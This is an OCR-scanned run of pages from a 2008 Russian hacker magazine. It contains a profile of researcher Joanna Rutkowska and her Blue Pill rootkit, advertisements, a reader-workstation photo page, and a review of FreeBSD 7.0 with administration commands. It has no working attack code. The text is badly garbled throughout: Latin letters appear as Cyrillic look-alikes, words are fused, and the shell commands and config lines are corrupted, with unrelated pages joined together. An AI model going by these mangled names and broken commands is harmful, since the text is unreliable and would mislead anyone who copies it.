чила Варшавский технологический университет (ѴѴагзаѵѵ Опіѵегзііу оі 
Тес Ьп о Іоду), а именно — матфак. Отметим, что всего 5% студентов на 
потоке — представительницы прекрасного пола. Сама Жанна (первый 
компьютер у которой появился в 1 1 -летнем возрасте) считает эту стати- 
стику странной — девушку-хакера удивляет, почему столь мало дам инте- 
ресуется точными науками. Но цифры цифрами, а по словам Рутковской, 
во время учебы она не испытывала никаких сексистских притеснений 
или проблем. 

Ее первым компьютером был ныне доисторический РС АТ, с 2 Мб ОЗУ, 

40 Мб дискового пространства и примитивной видеокартой «Негсиіез». 
Рутковская шутит, что ей ничего не оставалось, кроме как начать про- 
граммировать, ведь игры и «развлекательные» приложения на машине 
просто не шли. С самого детства любившая математику Жанна легко 
освоилась со сложной техникой, и на этом ее интерес не угас. В част- 
ности, она занялась Ассемблером, программированием, внутренним 
строением ОС и еіс. Все это плавно перетекло в увлечение написанием 
различных эксплойтов. 

Толчком к первому хаку послужила публикация в электронном журнале 
РЬгаск ( ЬіІрѴАл/ѵѵѵѵ.рЬгаск.огд/ ) — культовом андеграундном издании с 
более чем двадцатилетней историей. 

Напечатанная в этом оплоте хакерства статья описывала создание 
зІаск-зтазЫпд эксплойта, то есть атаку на переполнение буфера (она же 



атака срыва стека). После прочтения статьи Рутковская была настрое- 
на скептически, уверенная, что описанное во РЬгаск'е не сработает. 

Но эксперимента ради она воспроизвела эксплойт на своей машине и 
протестировала. Все получилось. По признанию Жанны, когда эксплойт 
срабатывает — это странное и волнующее ощущение, сродни какому-то 
волшебному трюку. 

Однако на волшебстве в наше время далеко не уедешь. Жанна задума- 
лась, чем она хочет заниматься. От интереса к устройству ОС она пришла 
к созданию руткитов. Так как Рутковская до сих пор специализируется 
именно в этой области, очевидно, выбор был удачен. Стоит отметить, 
что университетское образование мало общего имело с тем, чем Жанна 
занята сейчас. По сути, она самоучка и львиную долю знаний приобрела 
исключительно путем практики. 

г РАЗРАБОТКИ И ПРОЕКТЫ 

Определившись с направлением, Рутковская продолжительное время 
проработала в компании С05ЕІМС. Деятельность этой сингапурской 
фирмы, как несложно догадаться, ориентирована на исследования, раз- 
работки и предоставление услуг в сфере информационной безопасности. 
Именно под крылом С05ЕІЫС родился небезызвестный руткит Віие Рііі, 
вызвавший немало споров. 

В компании Жанна собрала вокруг себя коллектив людей, составивший 
небольшой отдел АбѵапсесІ Маіѵѵаге І_аЬз. Название переводится, как 
«Лаборатория продвинутого вредоносного ПО». Однако подразделение 
было создано исключительно во благо. Как говорится, «врага надо знать 
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в лицо», а «лучшая защита — это нападение». В общем-то, ни для кого 
не секрет, что многие хакеры стараются обращать внимание произво- 
дителей софта на недоработки, дыры и недочеты в их детищах, просто 
каждый делает это по-своему. В частности, у Рутковской была весомая 
причина работать именно над Ѵізіа, а не, скажем, 1_іпих — большинство 
заказчиков С05ЕІЫС интересовались безопасностью именно этой майк- 
рософтовской ОС. Спрос рождает предложение. 

Продуктом исследований и тестов стала «Синяя таблетка». Аналогия с 
«Матрицей» братьев Вачовски очевидна. Используя технологии аппарат- 
ной виртуализации, таблетка (если нужно — в обход цифровых подписей 
драйверов) устанавливает гипервизор (Ьурег-ѵізог) — и начинается. 
«Проглатывая» Віие рііі, система погружается во власть виртуального 
эмулятора и даже не подозревает об этом. 

Исходный код «пилюли» Жанна написала сама, опираясь на бета-версии 
Ѵізіа. Свои наработки в виде прототипа она поспешила представить сна- 
чала на конференции ЗуЗсап в Сингапуре (в июле 2006, одновременно 
осветив вопрос у себя в блоге), а затем, 3-го августа, выступила с докла- 
дом на ежегодном слете Віаск НаЕ в США. 

Руткит вызвал немалый резонанс, но вовсе не со стороны МісгозоЙ 
(они вообще отмахнулись от взлома, мол, никто не утверждал, что сло- 
мать новую ось, тем более, бету, нельзя), а со стороны коллег по цеху. 
Рутковская утверждала, что обнаружить Віие рііі 100% невозможно, и, 
конечно же, нашлись те, кто заявил, что они докажут обратное. В частно- 



сти, вызов Рутковской бросила команда Томаса Пташека (ТЬотаз Ріасек) 
— в лице самого Томаса, а также Нейта Лоусана (Ыаіе І_а\л/зоп) и Питера 
Ферри (Реіег Реггіе). Они предложили тест — взять два компьютера и 
на одном из них негласно запустить руткит. Команда Пташека напишет 
детектор, который сможет определить, на какой именно машине функ- 
ционирует «Синяя таблетка». Поединок, предположительно, должен был 
состояться во время Віаск Наі 2007. 

История получила довольно широкую огласку. За событиями следили не 
только в узких кругах, но и писали в новостях и блогах. Все ждали ответа 
Жанны. Вызов она приняла, но с некоторыми поправками. В частности, 
предложила увеличить число компьютеров до пяти (что довольно логич- 
но) и... попросила команду Пташека оплатить работу двух программистов, 
исходя из ставки $200 в час (зіс!) на человека. Учитывая, что по пример- 
ным подсчетам Жанны, на завершение работы над руткитом ушло бы 
около полугода, а обычный рабочий график — это 8 часов в сутки и 20 
дней в месяц, она запросила порядка $384000. Это решило дело. Здесь 
будет уместно процитировать самого Пташека: «Зачем нам покупать за 
$384000 руткит, который мы точно сможем обнаружить?» Поединок не 
состоялся. 

Жанна — завсегдатай всевозможных конференций, брифингов, съездов 
и форумов, посвященных информационной безопасности. А после того, 
как в 2006 журнал еѴѴеек включил ее в пятерку хакеров, оставивших след 
в истории уходящего года, Рутковскую можно назвать еще и настоящей 
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> Ііпкз 

• Ыиеріііргоіесі.огд 

— проект Віие рііі. 

• іпѵізіЫеіЫпдзІаЬ. 

сот — корпоратив- 
ный сайт ІТІ 

• іпѵізіЫеіЫпдз.огд 

— персональный сайт 
ІТІ_. 

• іЬеіпѵізіЫеіЫпдз. 
ЫодзроЕсот — блог 
Жанны. 



звездой. Число желающих взять у нее автограф после 
выступления постоянно растет. 

Доклады Жанны на мероприятиях такого рода в основном 
сконцентрированы вокруг нескольких проблем. Она часто 
выступаете обвинениями в адрес МісгозоЙ, утверждая, 
что те не желают смотреть правде в глаза и признать уяз- 
вимость своих систем. «Сама структура современных ОС 
такова, что даже опытный, продвинутый, юзер не может 
быть на 100% уверен в своей защищенности», — утвержда- 
ет девушка-хакер. Вообще, по мнению Рутковской, одна из 
главных проблем современного ПО заключается в том, что 
производители зацикливаются на предотвращении атак и 
проникновений вредоносного софта в систему, в то время, 
как техник его обнаружения гораздо меньше — и они не 
справляются со своей задачей. То есть, нужно или менять 
основы на аппаратном уровне или уделять больше внима- 
ния методам обнаружения. 

Согласна Рутковская и с еще одной актуальной проблемой 
сегодняшних дней, на которую очень любят кивать деве- 
лоперы: настоящий бич и самая большая дырка в безо- 
пасности — это сам пользователь. Жанна подчеркивает, 
что производителей это никоим образом не оправдывает, 
но склоняется к тому, что людям необходимо препода- 
вать азы компьютерной безопасности и, возможно, даже 
ввести какую-то аттестацию, по аналогии с получением 
водительских прав. Последнее особенно касается выхода 
в интернет. 




Н ЛАБОРАТОРИЯ НЕВИДИМЫХ ВЕЩЕЙ 

В середине 2007 Рутковская покидает С05ЕІ N С. Думаю, 
не в последнюю очередь потому, что компания охладела 
к проекту Віие рііі. Но Жанна уходит не в «неизвест- 
ность». В Варшаве она создает свою консалтинговую 
фирму и теперь может называться еще и «бизнес-леди». 
Детище Рутковской получает имя ІпѵізіЫе ТЫпдз І_аЬ 

— «Лаборатория невидимых вещей». 

По сути, в ІТІ_ работает только сама Жанна и наш сооте- 
чественник — Александр Терешкин ака 90210, специа- 
лист по руткитам, малварю и реверсному инжинирингу. С 
Терешкиным судьба свела Рутковскую еще в С05ЕІЫС, где 
он входил в состав ее команды АбѵапсесІ Маіѵѵаге І_аЬз. 

К ІТІ_ он присоединился в роли ведущего исследовате- 
ля. Едва ли не первым делом они переписали «Синюю 
таблетку» практически с нуля — новую версию Жанна 
назвала более зрелой. Интересно, что спонсировать их 
деятельность взялась небезызвестная компания РЬоепіх 
ТесЬпоІодіез, а большая часть кода теперь принадлежит 
«перу» Терешкина. Впрочем, Рутковская не раз призна- 
валась, что в новой фирме обязанности распределяются 
так: программирование преимущественно легло на плечи 
Александра, а сама она последнее время занимается 
вопросами бизнеса. 

Деятельность ІТІ_ ориентирована как на работу с разработ- 
чиками софта (от создателей ОС до девелоперов защитных 
программ), так и на корпоративных клиентов, нуждающихся 
в независимой проверке их систем безопасности. И конеч- 
но, на сотрудничество с правоохранительными органами. В 
основном — различные семинары и курсы на тему совре- 
менной кибер-преступности и того, как все это работает. 
Представителям правопорядка тоже нужно идти в ногу со 
временем. 

В ХОББИ И ЛИЧНАЯ ЖИЗНЬ 

Эту часть профайла мы нередко опускаем, так как, будем 
честны, мало кому интересно, под какую музыку кодитУолл 
или какую кухню предпочитает Джобс. Но сегодня случай 
особый. Поэтому несколько фактов, не касающихся профес- 
сиональной деятельности Рутковской. 

Жанна предпочитает джаз и классику (Вивальди и 
Паганини). Свободное от работы время проводит, как все 
нормальные люди — среди ее увлечений: походы в кино, 
театр или просто обычные прогулки. И кстати, к вопросу о 
кухне. Итальянская и японская :). 

Если бы Жанна не занималась компьютерами, то вполне 
могла бы представить себя в роли адвоката, юриста или 
следователя. По ее собственным уверениям, она совер- 
шенно не гуманитарий, но, как ни парадоксально, не воз- 
ражала бы и против писательской карьеры. 

На двух основных машинах дома Жанна использует 
ѴІБІа. Дело в том, что, по ее мнению, ореп зоигсе софт 
нисколько не безопаснее ПО платного. Конечно, у 
многих решений в области безопасности ноги растут 
именно из ореп зоигсе систем, но, видимо, Ѵізіа с ее 
знакомыми до боли багами все же милее. Вообще, 
против ІІпіх'а или МАО 05 Жанна совершенно ничего 
не имеет. Более того, ей приходилось работать и с 
ними, просто гораздо меньше, да и привычка — страш- 
ная сила. 

Вот и получается, дорогой читатель, что девушка-ха... пар- 
дон, специалист в области информационной безопасности 

— не такое уж диво и вовсе не страшный зверь. Напротив, 
Рутковскую хочется назвать секс-символом, гармонично 
вписывающимся в сферу ІТ.^Е 



► 082 
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подробности на игжш.датег5рагіу.ги 



КЛУБНЫЕ ВЕЧЕРИНКИ 

ДЛЯ ГЕЙМЕРОВ 

КАЖДЫЙ МЕСЯЦ 




с новейшими играми 




с ведущими разработчиками 




ТОК-ШОУ 



с презентациям* 
громких хитов 



ВЫСТУПЛЕНИЯ 

модных диджеев 



другое! 



(дт?}1апй 




огі.выпред 



РАБОЧЕЕ МЕСТО НОРМАЛЬНОГО ЧЕЛОВЕКА 



Монитор Арріе Сіпета 



Сан Саныч 



цветокорректор 



Гламурный телефон от 
Арріе. У догГа таких два. 
Маньяки. 



Арріе Мае Рго с двумя 
камнями Хеоп и 3 гига 



Идеальная чистота 



Роутер и по совмести- 
тельству А05І_-модем. 



РАБОЧЕЕ МЕСТО ХАКЕРА, 



/О МОНИК с открытой 
линуксовой консолью. 



Внешний винт на 1 Тб. 



Два айфона в кредлах. 



Системный блок в 
корпусе от Тб егт а Паке 
с 6 гигами оперативы, 

4 ядрами и стальными 
стенками ;). 



Мышьлазерная 

геймерская. 
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сцена 



РАБОЧИЕ МЕСТА ЧИТАТЕЛЕЙ 



Пришли на та§а2іпе@геа1. хакер. ги фотку своего действительно хакерского 
рабочего места (в хорошем разрешении) и мы опубликуем ее в следующих 



номерах! 




ІНе понимаем, как Симонов Михаил (зітйхакер.ги) ухитряется работать 

ИР I 



'Рабочее место хакера (гіоу.ипйаскйдтаіі.сот), который явно любит 
(бухнуть. Дохрена компов, водки, пива и мусора. ІІпЬаск обещал убраться и 
(просил передать привет 21оуТеат.Д 



затаким маленьким моником 



Евгений Ониксов (0п1хйхакер.ги>) живете буком и компьютерной 



ІБардак Коляна Беляева (хаскісЬйхакер.ги. 



итературои на кухне. 



4 ІІШ 



[У ріиіо (кбооІуЙгатЫег.ги) все очень цивильненько, так даже и 
[не скажешь, что хакер. 



іет вот в такой обстановке. 



кс мылом 
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ипіхоісі 




Великолепная 
семерка 



ОБЗОР НОВШЕСТВ В РРЕЕВББ 7-0 



В последние дни февраля была анонсирована седьмая версия популярной 



операционной системы РгееВЗР, де 



І 1 1 1 

факт о 



являющейся стандартом для 



серверов различной направленности. Разработчики шли к этому событию 
свыше двух лет. Многочисленные изменения затрагивают почти все ком- 
поненты ОС — ядро, сетевые протоколы, файловую систему... Самое время 



познакомиться с новинками. 

I I I І-і_ 

52 НЕМНОГО 0 РКЕЕВ5Р 

Чтобы начать разговор, нужно пару слов сказать о самой РгееВЗБ. Проект 
возник в начале 1 993 года на основе кода одной из систем, разработан- 
ных в недрах Калифорнийского Университета Беркли (Вегкеіеу БоЙѵѵаге 
ОізТгіЬиТіоп, отсюда и приставка В50). Цель проекта — предоставление про- 
граммного обеспечения, которое можетбыть использовано для любых целей 
и без дополнительныхограничений. Это гарантируется применяемой ВЗй 
лицензией, насчитывающей всего три пункта и разрешающей использование 
исходного кода системы без его обязательной публикации (как в бЫИ 6Р1_). 
Несмотря на изначальное ориентирование на работу в командной строке, 
РгееВЗО является самой современной ОС, поддерживающей многопро- 
цессорные и многоядерные системы, сетевое оборудование, мультимедиа 
устройства и прочее. И хотя эта операционка больше популярна на серверах, 
она также комфортно чувствует себя на ноутбуках и рабочих станциях. 

Помимо программ, включенных в базовую поставку, доступна коллекция портов 
и прекомпилированных пакетов, предоставляющая простой метод установки 
приложений. Не стоитзабывать и о бинарной совместимости, благодаря которой 
РгееВЗй умеет работать с приложениями, написанными для І_іпих. 

Существует две ветви РгееВЗй — СІІППЕМТ и 5ТАВБЕ. Первая относится к 
нестабильной и тестовой. В ней обкатывается новый экспериментальный код, 
поэтому предназначена она, скорее, для энтузиастов и опытных пользовате- 
лей. Послетестирования фичи попадают в производственную ветку 5ТАВБЕ, 

► з|6 




которая, как ни странно, тоже считается веткой для разработчиков. Рабочие 
серверы рекомендуется переводить на ЭТАВБЕ только после проверки 
работоспособности системы. Ріа основе 5ТАВБЕ периодически появляются 
тщательно протестированные релизы (РЕБЕА5Е). 

Итак, сегодня у нас на руках релиз 7.0, а седьмая ветка из СІІРРЕЫТ перешла 
в5ТАВІ_Е. 

0 ПОВЫШЕНИЕ ПРОИЗВОДИТЕЛЬНОСТИ 

В анонсе, появившемся после выхода РгееВЗй 7.0, отмечались повышенные 
производительность и стабильность системы в целом (особенно это касается 
многопроцессорных систем). В качестве доказательства был представлен 
ряд тестов ( реор[еігееЬ5СІ.ога/~кгІ5/5са[іпа ). Последняя фряха показывала в 
3.5 раза большую производительность по сравнению с РгееВЗй 6.x и на ~1 5% 
выше, чем І_іпих с различными ядрами ветки 2.6. 

За счетчего обеспечивается такой прирост? 

Исторически сложилось, что РгееВЗй была заточена под однопроцессорные 
системы и не очень дружила с несколькими процами. Работать с ними она 
могла ещестретьей версии, но вот используемый алгоритм «діапНоск»был 
далек от оптимального. Хотя пользовательский код и мог выполняться на не- 
скольких процессорах, ядро, «охраняемое» тріоск, в единицу времени обра- 
батывало только один процесс — исключение составляли разве что некоторые 
прерывания. Учитывая возрастающую популярность многопроцессорных, а 



ХАКЕР 05 /113/ 08 






ипіхоій 









I 




затем и многоядерных систем, такдолго продолжаться не могло. 
В 2000 году был создан проектБМРпд (БМР пехі депегабоп), на 
который и была возложена задача изменения дизайна ядра 
таким образом, чтобы программы могли выполняться парал- 
лельно. Дебют новой модели состоялся в версии РгееВБО 5.0, 
где тріоск был заменен целым набором локальных блокировок 
различных сервисов ядра, а обработка прерываний вынесена 
в отдельный процесс. Интересно, что в однопроцессорных 
системахтакая схема проигрывала в производительности. С 
версии РгееВБО 5.3 началась адаптация к параллельной работе 
некоторых системных функций, в частности сетевого стека и 
виртуальной памяти, которая была продолжена в шестой версии 
системы (например, ѴР5 и II Р5 уже до пускал и параллельный 
доступ). Впрочем, діапі Іоск присутствовал практически до выхо- 
да 7.0 (например, сетевой ЫЕТ_І\ІЕЕ05_6ІАМТубран летом 2007). 
Теперьже РгееВБО является операционкой, полностью поддер- 
живающей параллельное выполнение задач. Отмечается, что 
при последовательном увеличении процессоров до восьми, 
общая производительность системы растетлинейно. 

РІовый планировщик БІЕЕ втретьей редакции был переписан и 
оптимизирован для работы на мультипроцессорных системах. 
Алгоритм, использующий балансировку деревьев, достаточно 
сложен, и при выборе СРВ учитывает большое количество пара- 
метров, например, на каком из процессоров задача выполнялась 
в предыдущий раз. РІизкоприоритетная задача, запущенная на 
одном из СРІ), вытесняется высокоприоритетной. Правда, в вер- 
сии 7.0 поумолчанию используется древний 4В50 зГіесІиІег: 

% дгер ЗСНЕБ /изг/згс/зуз/сопТ/ШТЕЗ 
орбіопз 5СНЕБ_4В5Б 

#орЦіопз 5СНЕБ_иЬЕ 

Поэтому, чтобы увидеть в работе новый планировщик, ядро при- 
дется пересобрать. Но ІЭЕЕ уже официально рекомендуют для 
повышения производительности системы. Обещают, что с 7.1 
он будет использоваться по дефолту. Кстати, обрати внимание 
на название параметра — 5СНЕ0ДЭЕЕ. Третий БЕЕ является 
форком оригинального БІБЕ 2.0 и раньше назывался — 5СНЕ0_ 
БМР (наверное, поэтому именнотаконуказывается во многих 
новостных лентах и обзорах). 

Библиотека рЬктаІІос, отвечающая за управление динамичес- 
кой памятью и разработанная еще в середине 90-х Поулом Кам- 
пом, заменена еітаііос [ реор[еТгееЬ5с1.ога/~|а50пе/|етаЦос 1. 
которая написана сучетом работы на БМР-системах. 

И ФАЙЛОВЫЕ СИСТЕМЫ 

РгееВБО получила поддержку файловой системы 2Р5 (2еНаЬуІе 
Рііе Бувіепп), которая первоначально разрабатывалась Бип 
МісговуБІетвдля Боіагів. Особенностью 128-битной 2Р5 являет- 
ся возможность работы с файлами и разделами очень большого 
размера. В ней объединена концепция файловой системы и 
менеджера логических дисков (как І_ѴМ). Ее отличают высокое 
быстродействие, простоеуправление объемами хранения дан- 
ных, отсутствие фрагментации, переменный размер блока и ме- 
ханизмы, обеспечивающие целостность да иных. Ріо пока такая 
поддержка отмечена какэкспериментальная и имеетрядогра- 
ничений. РІапример, РгееВБО не может загружаться с2РБ,также 
не поддерживается АС Б и некоторые другие характеристики 
2РБ. Ктомуже, она пока доступ на только для платформ атсІ64, 
І386 и рс98. Ріо главное — файловые системы ІЮРтеперь можно 
строитьпрямо на 2РБ! Поумолчанию модуль 2 Р5 отключен и 
советую перед началом работы почитать 2Р5СІиіск5іаг10иіс1е 
[ уѵікіТгееЬвсІ.ога/2В50иіск5іагі0иіс1е ). 

РІазовуеще один немаловажный нюанс. Обычно каталог /Ьооі 
монтируется в режиме только для чтения (взіпдіе тобе), но 
утилитам 2Р5 необходима возможность записи в /Ьооѣ/гРз, 



иначе, в случае изменения структуры, при следующей загрузке 
возможно завершение с ошибкой. Это нужно помнить при 
использовании 2Р5. 

В версию 7.0 добавлен порт файловой системы {тр^в, которая 
была разработана ІМеШБО’шниками в рамках программы боодіе 
Биттего^Собе. Этот модуль тоже помечен как эксперименталь- 
ный, но он тщательно протестирован и вполне готов к работе. 

В Еіпихтехнология появилась намного раньше. С ее помощью 
можно использовать участки ОЗУ какобычные блочныеустройс- 
тва. Учитывая, что обмен данными в оперативке на несколько 
порядков выше, можно увеличить скорость выполнения 
некоторых операций. Не знаю, окажется ли востребованной эта 
функциональность на десктопах и серверах, но на встроенных 
устройствах лишней она точно не будет. Чтобы подключить 
ІтрТв, достаточно выполнить команду: 

# есЪо ' Ршрбз_1оа(5="УЕ5" ' » /ЪооБ/ІоасІег . сопб 

При компиляции ядра незабываем включить параметр 
« орііопз ТМРР5». И теперь монтируем любой каталог, напри- 
мер /Ітр: 

# шоипр -Б ЕтрТз ЕгпрТз /Етр 

Для автоматического монтирования при загрузке добавляем 
эту запись в /еІс/ИзІаЪ. Последним параметром обязательно 
должен стоять 0. Иначе Рзск попробует проверить ітрЛз и 
потерпит неудачу (так как не поддерживает данный тип ФС), что 
остановит или задержит процесс загрузки. 

Кмодульной системеуправления дисками 6Е0М, появившейся в 
РгееВБО 5.x, добавлен новый класс 6Е0М_~І00РМАЕ(ранеетре- 
бовался патч). Он обеспечиваетлюбой объектбЕОМ средствами 
регистрации данных. Поддержка в коде II Р5 (пока только ІІРВ) 
означает, что при необходимости ее очень легко можно сделать 
журналируемой, увеличивая скорость загрузки системы (не нужно 
запускать Лзск) и гарантируя целостность да иных. Дляуправле- 
нияжурналированием файловой системы предназначена утилита 
дзоитаі (8) .Журналирование осуществляется на уровне 
блоков, а не на уровне файловой системы, то есть в протокол 
попадают данные и метаданные. При этом данные и журнал могут 
храниться как одном, так и на разных поставщиках. Последний 
вариант пригодится при повышении производительности дис- 
ковой подсистемы. Чтобы оптимизировать производительность, 
при использовании д^оитаі следует отключать механизм 
Бой Бірсіаіев. Но это еще не все. Например, д^ои^па1 может 
быть сконфигурирован поверх других поставщиков ( дтіггог , 
дгаісІЗ), которые теперь также будут поддерживаться в целост- 
ном состоянии. Азначит, синхронизацию после отказов системы 
на них можно отключить. Настроить журналирование на II Р5 при 
помощи д^оигпаі достаточно легко: 

# дзоигпаі Іоасі 

Теперь создаем 6Е0М-поставщика: 

# дзоигпаі ІаЪеІ /йеѵ/сІаО 

На устройство натравливаем пеѵ/Рз или Сипела с ключом '-<7' и 
выполняем монтирование: 

# пеѵ/Тз -Т /сіеѵ/сІаО . зоигпаі 

# шоипЦ -о азупс /сіеѵ/сІаО . зоигпаі /тпр 

Параметр азупс команды тоипѣ рекомендуется при исполь- 
зовании журнала. Дефолтное ядро версии 7.0 поддерживает 
дригпаі по умолчанию, и нужный модуль загружается при 





> іп!о 

• Талисманом 
системы является 
демоненок Веавбе. 
Есть и еще один, 
менее известный, 
талисман: ОеѵіІеНе 
(ака баетопЬаЬе, 
сіаетопевв) — девуш- 
ка в демоническом 
красном костюме. 

• В новой фре убраны 
все утилиты тоипІ_*. 
Привыкай задавать 
тип файловой системы 
через «тоипі -I»! 

• Упростить настройку 
РгееВБО можно за 
счет использования 
графических инс- 
трументов, разраба- 
тываемых проектом 
ОевкІюрВБО. Ты 
найдешь их в портах 
(вуБибІБ/сІезкІорЬзсІ- 
іооіб). 

• Дерево портов 
РгееВБО содержит 
правила сборки для 
18000 приложений. 

• В РгееВБО 8 нас 
ждут: улучшенный 
планировщик II БЕ, 
ЬвсІІаЬеІ, поддержи- 
вающий 26 разделов, 
поддержка загрузки 
из разделов ОРТ (ОБЮ 
рагббоп ІаЫев), вир- 
туализация сетевого 
стека, продолжение 
работы по портирова- 
нию Оігасе и многое 
другое. 
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Меню зузіпзіаіі — ничего не изменилось 




запросе. При самостоятельной пересборке не забудь включить «орііопз Выбор файловой системы в ЛпзІаІА 

ЦР5_(^0ѴШАЬ». Для подстраховки следуетуказать за грузку модуля: 



# есЬо ' деот_зоигпа1_1оа<і="УЕЗ" ' » /ЪооБ/ІоасІег . сопЕ 

Можно настроить журналирование и на существующей файловой системе, 
нотолько втом случае, если последний сектор, в котором д^оитаі хранит 
информацию, не использован файловой системой. 

Класс дѵігзіог (ѵѵікіІезЕІтееЬзсІ.огд/дѵігзІюг ) позволяет создавать виртуаль- 
ные ѲЕОМ-провайдеры большей емкости, чем имеющееся в распоряжении 
физическое хранилище (режим оѵегсотті Ы. Стоит отметить, что ктакому 
виртуальному устройству очень просто добавить дополнительные разделы. 
Процесс выглядит следующим образом. Сначала создаем устройство /<Иеѵ/ 
ѵігзѣог/тусіізк, к которому привязываем диски абб и абб: 

# дѵігзЕог ІаЪеІ -ѵтусіізк /сіеѵ/асі5 /сіеѵ/асіб 
Формируем файловую систему: 

# пеілгЕз /сіеѵ/ѵігзБог/тусІізк 
Дополнительный диск добавляется командой: 

# дѵігзЕог асісі тусіізк а<17 

Если устройство не востребовано, его легко можно удалить, используя пара- 
метр гетоѵе, а введя «дѵігзѣог Іізі:», получим списокзадействованных 
устройств. 

Это далеко не все изменения, коснувшиеся дисковой подсистемы. Класс 
6Е0М_М1)ЕПРАТН (дтиШраФ) позволяет создавать несколько точекдоступа 
к диску, управление возможно при помощи утилиты дтиіііраѣіі. Из Еіпих 
был портирован код, реализующий поддержку файловой системы ХР5, прав- 
да, в режиме «только чтение». 

Серверная и клиентские части ЫР5 и псевдо ФС (ргосіз и другие) избавились 
от глобальных блокировок, что дает заметный прирост производительности 
на многопроцессорных системах. 

Долгое время реализация файловой системы «промежуточного уровня» ипіопіз 



в РгееБЭй находилась в весьма плачевном состоянии. Даже в официальной до- 
кументации большими буквами пугали нашего брата, мол, поддерживается она 
не полностью, использовать ее можно лишь на свой страх и риск. Да и понятие 
«стабильность работы» кактаковое отсутствовало. Уронить систему или потерять 
информацию при использовании ипіопИз было просто. В версии 7.0 появилась 
новая, стабильная реализация этой файловой системы, написанная Даичи Гото 
( реор[еігееЬ5б.огд/~баісЫ/ипіопЫ с нуля. Более того, она перекочевала и в 
шестую ветку РгееВЗБ. Это открывает большие возможности, например, можно 
смонтировать СЭ-РОМ и «записывать» в него информацию: 

# тоипЕ -к сс19660 -о го /сІеѵ/ассЮ /ссігот 

# тоипЕ — к ипіопЕз -о поаЕіте /ѵаг/ссігот /ссігот 

Теперь каталог /ѵаг/ссігот примонтирован «поверх» /ссігот и с ним 
можно работать как с обычным разделом жесткого диска. Кстати, в новой 
фре убраны все тоипѣ_* утилиты [тоипі:_(іеѵ^з,тоипі:_ехі2^з, 
тоипі:_1іпргос^з,тоипі:_ргос^з, тоипі:_1іпзуз^з и т.д.). Теперь 
тип файловой системы задается через параметр '-Б'. 

В СЕТЕВЫЕ возможности 

Сетевые возможности претерпели не менее глобальные изменения, что, в 
общем-то, неудивительно, так как это направление всегда активно развива- 
лось во фряхе. К примеру, новая реализация системного вызова зепсШИе ( ) 
умеет отправлять большие объемы данных и совместно сТ50 и другими 
дополнениями обеспечивает чутьли не пятикратное увеличение произво- 
дительности, особенно в гигабитных сетях. Добавлена поддержка протокола 
передачи суправлением потоком 5СТР (Бігеат СопІгоІТгапзтіззіоп Ргоіосоі) 
— пока экспериментальная, но в 6ЕЫЕРІС по умолчанию она активирована. 
Появление Т50 (ТСР/ІР Бедгпепі ОГГІоасІ) и БРО (Багде Ресеіѵе (ЖоасІ) дает 
возможность перенести обработкуТСР-соединений на сетевые карты, что 
снижает нагрузку на систему и опять же повышает производительность. Надо 
сказать, поддержка реализована недля всехдрайверов. 

Добавим сюда возможность автоматического определения размера ТСР бу- 
фера в зависимости отскорости соединения. Ранее размер составлял 32 Кбит, 
но на гигабитных скоростях этого уже недостаточно. Крометого, появилась 
поддержка 1 0-гигабитных сетевых карт. Напомню, что еще в версии 6.3 поя- 
вился портированный из 0реп/ЫеіВ50 драйвер, позволяющий объединять 
каналы в виртуальный сетевой интерфейс с возможностью обеспечения 
бесперебойной работы — 1адд(4) : 

# іЕсопЕід есЮ ир 

# іЕсопЕід ѵгО ир 

# іЕсопЕід ІаддО сгеаБе 

# іЕсопЕід ІаддО ир ІаддргоБо Іаср ІаддрогЕ есЮ ІаддрогЕ ѵгО 

# іЕсопЕід ІаддО 192.168.1.200 пеЕтазк 255.255.255.0 

# гоиЕе асісі -пек 0.0. 0.0 192.168.1.1 0.0. 0.0 

В РгееВББ добавлены новые узлы МеІдгарЬ:ид_саг — алгоритм ы ог- 
раничения трафика, пд_ с?еТ 1 а Б е и пд_ргес!1 — п одде ржка деНІа Е е и 
ргесіісііог-1 сжатия для РРР 



Ріпзтаіі 

Проект РіпзІіаП активно развивается. В нем реализованы продвину- 
тые функции, которых нет в зузіпзиаіі: возможность запуска с БіѵеСО 
и установка по сети. Он написан на языке РуіФоп с использованием 
модуля РуСТК и построен по модульному принципу, в котором ЕгоШ-епсІ 
и Ъаск-епсі разделены. Такой подход открывает перед разработчиками 
широкие возможности по модификации и наращиванию функционала. 
Пока его обещают включить в стандартную поставку в качестве второго 
дополнительного инсталлятора с версии 7.1 (за исключением архи- 
тектур, не поддерживаемых ТіпзБаІІ (іа64, рс98 и РоѵѵегРС), в которых 
зузіпзЩІІ останется единственным средством) . 

I 
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В тесте производительности Му50І_ новая фря побеждает 



В ноябре 2005 года была предложена КАМЕ реализация ІРЗес, 
но в это время на основе КАМЕ и кода ОрепВЗО под руководст- 
вом Сема Леффлера уже проводились работы по адаптации 
ІРЗес кмногопроцессорному окружению. Некоторое время 
РА5Т_ІР5ЕС был доступен в виде патчей. Теперь КАМЕ офи- 
циально убран, а в РА5Т_ІР5ЕС добавлена поддержка ІРѵб и 
аппаратного ускорения шифрования. 

Разработчики учли все возрастающую популярность беспро- 
водных сетей. В этом направлении была проделана неплохая 
работа, и в результате система получила полную поддержку 
семейства стандартов 802.1 1 (ѴѴі-Рі иѴѴіМах). 

Полностью отказались отутилиты і лгісопігоі, которая при- 
менялась для настройки работы беспроводных интерфейсов, 

— теперь для этих целей предложено использовать более 
привычный іЛсопНід. 

Для зузсЫ появились новые переменные, позволяющие 
на лету управлять параметрами различных подсистем ядра. 
Например, кет.сопШхЪ позволяет просмотреть содержи- 
мое файла конфигурации для текущей сборки ядра, лес . ілеС . 
і стр . г ер 1у_Игот_іп С егИасе в кл ю ч а ет отп р а в ку I С М Р отв е - 
товс ІР, на который пришел пакет, а в кет . коз кии ісі записан 
уникальный идентификатор узла ШЮ. 

Теперь стало возможным без наложения дополнительных пат- 
чей динамически вычислить размер ТСР буферов в зависимости 
оттипа сетевой активности. Управление осуществляется через 
ряд переменных вузсИ., начинающихся с лес . ілеС . Сер. 
зеп6Ъик_* и леС . ілеС . С ср . гесѵЪиИ_*: 

пеС . ілеС . Сер . зеп(ЗЬиЕ_аиСо=1 

пеС . ілеС . Сер . гесѵЪи:Е_аиСо=1 

0 ПРОСТРАНСТВО ПОЛЬЗОВАТЕЛЯ (АКА ДОЕНІ-ДЫР) 

Первое, что бросается в глаза в новой версии, это полное 
обновление прикладного программного обеспечения. Особо 
можно отметить: КОЕ 3.5.8, 6Ы0МЕ 2.20.2, Х.Огд 7.3, 6СС 
4.2.1, В I N 0 9.4.2, Зепсітаіі 8.14.2, ОрепЗЗЬ 0.9.8е. Причем, в 
